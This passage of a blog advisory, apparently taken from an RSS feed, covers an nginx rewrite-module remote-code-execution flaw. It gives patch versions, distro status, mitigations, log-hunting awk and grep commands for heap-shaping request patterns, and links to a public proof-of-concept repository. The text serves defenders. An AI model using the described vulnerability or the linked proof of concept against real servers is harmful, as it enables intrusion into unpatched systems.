          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-patch-matrix"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><pre><code class="hljs language-text">+--------------------------------+-------------------------------------+
| Software                       | Patched version                     |
+--------------------------------+-------------------------------------+
| nginx (mainline)               | 1.31.0                              |
| nginx (stable)                 | 1.30.1                              |
| NGINX Plus R36                 | R36 P4                              |
| NGINX Plus R35                 | R35 P2                              |
| NGINX Plus R32                 | R32 P6                              |
| F5 NGINX Ingress Controller    | 5.4.2 (when released)               |
| F5 NGINX App Protect WAF       | 4.16.1 / 5.8.1 (when released)      |
| F5 NGINX Gateway Fabric        | 2.5.2 (when released)               |
| F5 NGINX Instance Manager      | 2.21.2 (when released)              |
| OpenResty                      | No advisory yet                     |
| Tengine, Angie, FreeNGINX      | No advisory yet                     |
| Kong, APISIX                   | No advisory yet                     |
| Kubernetes ingress-nginx       | Retired, no patch coming            |
+--------------------------------+-------------------------------------+
</code></pre><p>Distro status as of this morning (2026-05-14):</p>
<ul>
<li><strong>Debian</strong> (<a href="https://security-tracker.debian.org/tracker/CVE-2026-42945">tracker</a>): bullseye, bookworm, trixie, forky all show vulnerable. Only <code>sid</code> has the fixed <code>1.30.0-3</code> package landed.</li>
<li><strong>AlmaLinux</strong>: backport for 8, 9, and 10 <a href="https://almalinux.org/blog/2026-05-13-nginx-rift-cve-2026-42945/">published</a> in the <code>testing</code> repos using the upstream patch. Worth pulling if you cannot wait for RHEL.</li>
<li><strong>RHEL, Ubuntu, Alpine</strong>: no published advisories yet.</li>
</ul>
<p>The Kubernetes <code>ingress-nginx</code> line is the one to flag for your platform team. That project went EOL in <a href="https://kubernetes.io/blog/2025/11/11/ingress-nginx-retirement/">March 2026</a> and there is no maintainer left to ship a patched container image. If you are still on it, this is the second CVE in nine days where the answer is &quot;there is no patch coming, plan the Gateway API migration.&quot; We covered that migration <a href="/posts/ingress-nginx-eol-gateway-api-migration">in a separate post</a>.</p>
<h2 id="h2-if-you-cannot-patch-in-the-next-24-hours" class="group relative scroll-mt-24">
        <a href="#h2-if-you-cannot-patch-in-the-next-24-hours" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you cannot patch in the next 24 hours
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-if-you-cannot-patch-in-the-next-24-hours"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>There is no published WAF rule from Cloudflare&#39;s managed set, AWS WAF managed rules, or the OWASP Core Rule Set as of this morning. A custom rule that drops URLs containing combinations of percent-encoded bytes and unencoded special characters can blunt the most obvious PoC, but the underlying primitive is broad and the attacker can vary their input shape considerably.</p>
<p>The realistic short-term mitigations:</p>
<ol>
<li><strong>Audit and edit the vulnerable rewrite blocks.</strong> If a <code>rewrite</code> line carries the dangerous pattern and you can rewrite it without the <code>?</code> or the unnamed capture, do that. Most API-gateway rewrites can move the query-string concatenation into a <code>set $args ...</code> statement instead of stuffing it into the <code>rewrite</code> replacement.</li>
<li><strong>Front nginx with a non-nginx proxy that can drop malformed paths.</strong> A separately-deployed Envoy or HAProxy in front of nginx does not magically rescue you, because both proxies forward the URL path unchanged by default. But you can add path-normalisation or path-length limits at the front proxy that make exploitation harder. This buys time, not safety.</li>
<li><strong>Run workers under a tightly scoped systemd unit.</strong> <code>NoNewPrivileges=yes</code>, <code>ProtectSystem=strict</code>, <code>ProtectHome=yes</code>, <code>PrivateTmp=yes</code>, <code>RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6</code>, <code>SystemCallFilter=@system-service</code>, and especially <code>MemoryDenyWriteExecute=yes</code>. None of these stop the corruption, but <code>MemoryDenyWriteExecute=yes</code> plus the <code>RestrictAddressFamilies</code> line break the PoC&#39;s preferred follow-up of dropping a shell. You still want to upgrade.</li>
</ol>
<p>Removing the <code>rewrite</code> module entirely at build time is possible (<code>./configure --without-http_rewrite_module</code>) but breaks more than it fixes for most deployments.</p>
<h2 id="h2-what-to-watch-in-your-logs" class="group relative scroll-mt-24">
        <a href="#h2-what-to-watch-in-your-logs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to watch in your logs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-watch-in-your-logs"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>There is no canonical detection signature yet. The PoC needs to send a stream of requests to shape the heap before the trigger request arrives, so a spike in same-prefix requests from one source to URLs that hit your rewrite blocks is the kind of pattern that should raise eyebrows. Two queries worth running over the last week&#39;s access logs:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Many requests to the same URL prefix from the same source in a short window</span>
awk <span class="hljs-string">&#x27;{print $1, $7}&#x27;</span> /var/log/nginx/access.log \
  | <span class="hljs-built_in">sort</span> | <span class="hljs-built_in">uniq</span> -c | <span class="hljs-built_in">sort</span> -rn | <span class="hljs-built_in">head</span> -50
</code></pre><pre><code class="hljs language-bash"><span class="hljs-comment"># Requests where the path contains long sequences of percent-encoded bytes</span>
grep -E <span class="hljs-string">&#x27;%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}&#x27;</span> \
  /var/log/nginx/access.log | <span class="hljs-built_in">head</span> -50
</code></pre><p>Neither is specific enough to alert on, but both are good enough for retrospective investigation if you suspect compromise. Combine with worker process crash reports in your system journal (<code>journalctl -u nginx</code>).</p>
<h2 id="h2-the-ai-found-angle" class="group relative scroll-mt-24">
        <a href="#h2-the-ai-found-angle" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The AI-found angle
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-ai-found-angle"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The bug was found by an autonomous code-audit system run by <a href="https://depthfirst.com">depthfirst</a>, in a six-hour run on the nginx codebase in April 2026. The same run surfaced four other memory-corruption issues, all of which F5 confirmed. The disclosure timeline was tight (April 18 found, April 21 reported, April 28 working RCE PoC, May 13 advisory), which is roughly the speed an AI-assisted research workflow lets a small team operate at.</p>
<p>The framing matters less than the implication. The codebase that nobody has shipped a critical RCE against in 18 years now has one shipped against it inside a single afternoon of automated review. The cadence of these &quot;old codebase, new CVE&quot; disclosures is going to keep getting faster, and the operational discipline that lets you patch in 24 hours instead of three weeks is going to keep getting more valuable.</p>
<h2 id="h2-sources" class="group relative scroll-mt-24">
        <a href="#h2-sources" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sources
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-sources"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>F5 advisory K000161019: <a href="https://my.f5.com/manage/s/article/K000161019">my.f5.com/manage/s/article/K000161019</a></li>
<li>nginx security advisories index: <a href="https://nginx.org/en/security_advisories.html">nginx.org/en/security_advisories.html</a></li>
<li>Fix commit: <a href="https://github.com/nginx/nginx/commit/2046b45aa0c6e712c216b9075886f3f26e9b4ca9">github.com/nginx/nginx/commit/2046b45aa0c6e712c216b9075886f3f26e9b4ca9</a></li>
<li>depthfirst writeup: <a href="https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability">depthfirst.com/research/nginx-rift</a></li>
<li>PoC repository: <a href="https://github.com/depthfirstdisclosures/nginx-rift">github.com/depthfirstdisclosures/nginx-rift</a></li>
<li>NVD entry: <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42945">nvd.nist.gov/vuln/detail/CVE-2026-42945</a></li>
<li>Debian tracker: <a href="https://security-tracker.debian.org/tracker/CVE-2026-42945">security-tracker.debian.org/tracker/CVE-2026-42945</a></li>
<li>AlmaLinux backport: <a href="https://almalinux.org/blog/2026-05-13-nginx-rift-cve-2026-42945/">almalinux.org/blog/2026-05-13-nginx-rift-cve-2026-42945</a></li>
<li>Original disclosure tweet: <a href="https://x.com/IntCyberDigest/status/2054844733571092943">@IntCyberDigest on X</a></li>
</ul>
<p>Grep first. Patch second. Plan the ingress-nginx migration if you have not already.</p>
]]></content:encoded>
    </item>
  </channel>
</rss>